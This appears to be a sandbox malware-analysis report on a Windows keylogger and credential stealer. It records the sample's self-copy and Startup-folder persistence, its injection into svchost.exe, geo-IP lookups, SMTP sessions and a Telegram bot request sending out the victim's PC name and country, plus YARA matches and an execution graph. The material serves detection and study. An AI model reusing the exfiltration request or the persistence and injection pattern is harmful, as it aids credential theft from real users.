                                                                                      2024-10-09 10:13:53 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.849740188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:54 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-09 10:13:55 UTC709INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:54 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 50
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lwRBnj8DO12WLWdKDWj9w4lgB7Wsntz0qZwPdT7nm3%2B67pIPbFBM97LJJ09t2WxPsVNTAthF2WpKcRkF%2BjB%2FiUj8dYrQ4Y89MjKOFtlrej9XsrMAOB%2FoH5M%2B0przkvUGhvdx%2Fzq4"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99ca8ad40cc4-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-10-09 10:13:55 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.849743188.114.97.34437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:56 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:56 UTC709INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:56 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 52
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1N0qr%2FaIUmL%2FXkG1j7mC6DLvmMBzHUQSX7%2BBY%2BV%2FDdQH3ZB%2BnFfxWWfHey3dy5aLZHoD8dh2bHMNLoI1nrEYB4C8alR5u8T0a6yhpR0apt3fyI36H8LBk95kE9KJw5fuLPefNfi7"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99d2890418ee-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-10-09 10:13:56 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.849744149.154.167.2204437524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:57 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2017:58:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                      Host: api.telegram.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:57 UTC344INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 09 Oct 2024 10:13:57 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 55
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-10-09 10:13:57 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Oct 9, 2024 12:13:41.346596956 CEST58749725185.230.214.164192.168.2.8220 mx.zoho.eu SMTP Server ready October 9, 2024 12:13:41 PM CEST
                                                                                      Oct 9, 2024 12:13:41.346930027 CEST49725587192.168.2.8185.230.214.164EHLO 910646
                                                                                      Oct 9, 2024 12:13:41.918139935 CEST58749725185.230.214.164192.168.2.8250-mx.zoho.eu Hello 910646 (8.46.123.33 (8.46.123.33))
                                                                                      250-STARTTLS
                                                                                      Oct 9, 2024 12:13:42.047112942 CEST58749725185.230.214.164192.168.2.8250 SIZE 53477376
                                                                                      Oct 9, 2024 12:13:42.047276020 CEST49725587192.168.2.8185.230.214.164STARTTLS
                                                                                      Oct 9, 2024 12:13:42.234929085 CEST58749725185.230.214.164192.168.2.8220 Ready to start TLS.
                                                                                      Oct 9, 2024 12:14:04.277956963 CEST58749745185.230.214.164192.168.2.8220 mx.zoho.eu SMTP Server ready October 9, 2024 12:14:04 PM CEST
                                                                                      Oct 9, 2024 12:14:04.278290987 CEST49745587192.168.2.8185.230.214.164EHLO 910646
                                                                                      Oct 9, 2024 12:14:04.470447063 CEST58749745185.230.214.164192.168.2.8250-mx.zoho.eu Hello 910646 (8.46.123.33 (8.46.123.33))
                                                                                      Oct 9, 2024 12:14:04.606333971 CEST58749745185.230.214.164192.168.2.8250-STARTTLS
                                                                                      250 SIZE 53477376
                                                                                      Oct 9, 2024 12:14:04.606564045 CEST49745587192.168.2.8185.230.214.164STARTTLS
                                                                                      Oct 9, 2024 12:14:04.797442913 CEST58749745185.230.214.164192.168.2.8220 Ready to start TLS.

                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:06:13:00
                                                                                      Start date:09/10/2024
                                                                                      Path:C:\Users\user\Desktop\kG713MWffq.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\kG713MWffq.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'116'491 bytes
                                                                                      MD5 hash:E483D0750DCF2ED63E9FE1E649E7708B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:06:13:09
                                                                                      Start date:09/10/2024
                                                                                      Path:C:\Users\user\AppData\Local\Videos\vexplores.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\kG713MWffq.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'116'491 bytes
                                                                                      MD5 hash:E483D0750DCF2ED63E9FE1E649E7708B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 68%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:06:13:20
                                                                                      Start date:09/10/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\kG713MWffq.exe"
                                                                                      Imagebase:0xd20000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3867759274.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.3865281483.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:5
                                                                                      Start time:06:13:32
                                                                                      Start date:09/10/2024
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs"
                                                                                      Imagebase:0x7ff74b9f0000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:06:13:33
                                                                                      Start date:09/10/2024
                                                                                      Path:C:\Users\user\AppData\Local\Videos\vexplores.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Videos\vexplores.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'116'491 bytes
                                                                                      MD5 hash:E483D0750DCF2ED63E9FE1E649E7708B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:06:13:42
                                                                                      Start date:09/10/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\Videos\vexplores.exe"
                                                                                      Imagebase:0xd20000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.3865282066.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.3%
                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                        Signature Coverage:9.7%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:34
                                                                                        execution_graph 86339 4010e0 86342 401100 86339->86342 86341 4010f8 86343 401113 86342->86343 86344 401182 86343->86344 86345 401120 86343->86345 86346 401184 86343->86346 86347 40114c 86343->86347 86348 40112c DefWindowProcW 86344->86348 86345->86348 86401 401000 Shell_NotifyIconW __setmbcp_nolock 86345->86401 86380 401250 86346->86380 86349 401151 86347->86349 86350 40119d 86347->86350 86348->86341 86354 401219 86349->86354 86355 40115d 86349->86355 86352 4011a3 86350->86352 86353 42afb4 86350->86353 86352->86345 86362 4011b6 KillTimer 86352->86362 86363 4011db SetTimer RegisterWindowMessageW 86352->86363 86396 40f190 10 API calls 86353->86396 86354->86345 86359 401225 86354->86359 86357 401163 86355->86357 86358 42b01d 86355->86358 86356 401193 86356->86341 86364 42afe9 86357->86364 86365 40116c 86357->86365 86358->86348 86400 4370f4 52 API calls 86358->86400 86412 468b0e 74 API calls __setmbcp_nolock 86359->86412 86395 401000 Shell_NotifyIconW __setmbcp_nolock 86362->86395 86363->86356 86370 401204 CreatePopupMenu 86363->86370 86398 40f190 10 API calls 86364->86398 86365->86345 86372 401174 86365->86372 86366 42b04f 86402 40e0c0 86366->86402 86370->86341 86397 45fd57 65 API calls __setmbcp_nolock 86372->86397 86374 42afe4 86374->86356 86375 42b00e 86399 401a50 328 API calls 86375->86399 86376 4011c9 PostQuitMessage 86376->86341 86379 42afdc 86379->86348 86379->86374 86381 4012e8 86380->86381 86382 401262 __setmbcp_nolock 86380->86382 86381->86356 86413 401b80 86382->86413 86384 40128c 86385 4012d1 KillTimer SetTimer 86384->86385 86386 4012bb 86384->86386 86387 4272ec 86384->86387 86385->86381 86390 4012c5 86386->86390 86391 42733f 86386->86391 86388 4272f4 Shell_NotifyIconW 86387->86388 86389 42731a Shell_NotifyIconW 86387->86389 86388->86385 86389->86385 86390->86385 86394 427393 Shell_NotifyIconW 86390->86394 86392 427348 Shell_NotifyIconW 86391->86392 86393 42736e Shell_NotifyIconW 86391->86393 86392->86385 86393->86385 86394->86385 86395->86376 86396->86356 86397->86379 86398->86375 86399->86344 86400->86344 86401->86366 86404 40e0e7 __setmbcp_nolock 86402->86404 86403 40e142 86405 40e184 86403->86405 86511 4341e6 63 API calls __wcsicoll 86403->86511 86404->86403 86406 42729f DestroyIcon 86404->86406 86408 40e1a0 Shell_NotifyIconW 86405->86408 86409 4272db Shell_NotifyIconW 86405->86409 86406->86403 86410 401b80 54 API calls 86408->86410 86411 40e1ba 86410->86411 86411->86344 86412->86374 86414 401b9c 86413->86414 86433 401c7e 86413->86433 86435 4013c0 86414->86435 86417 42722b LoadStringW 86420 427246 86417->86420 86418 401bb9 86440 402160 86418->86440 86454 40e0a0 86420->86454 86421 401bcd 86423 427258 86421->86423 86424 401bda 86421->86424 86458 40d200 52 API calls 2 library calls 86423->86458 86424->86420 86425 401be4 86424->86425 86453 40d200 52 API calls 2 library calls 86425->86453 86428 427267 86429 42727b 86428->86429 86431 401bf3 _wcscpy __setmbcp_nolock _wcsncpy 86428->86431 86459 40d200 52 API calls 2 library calls 86429->86459 86432 401c62 Shell_NotifyIconW 86431->86432 86432->86433 86433->86384 86434 427289 86460 4115d7 86435->86460 86441 426daa 86440->86441 86442 40216b 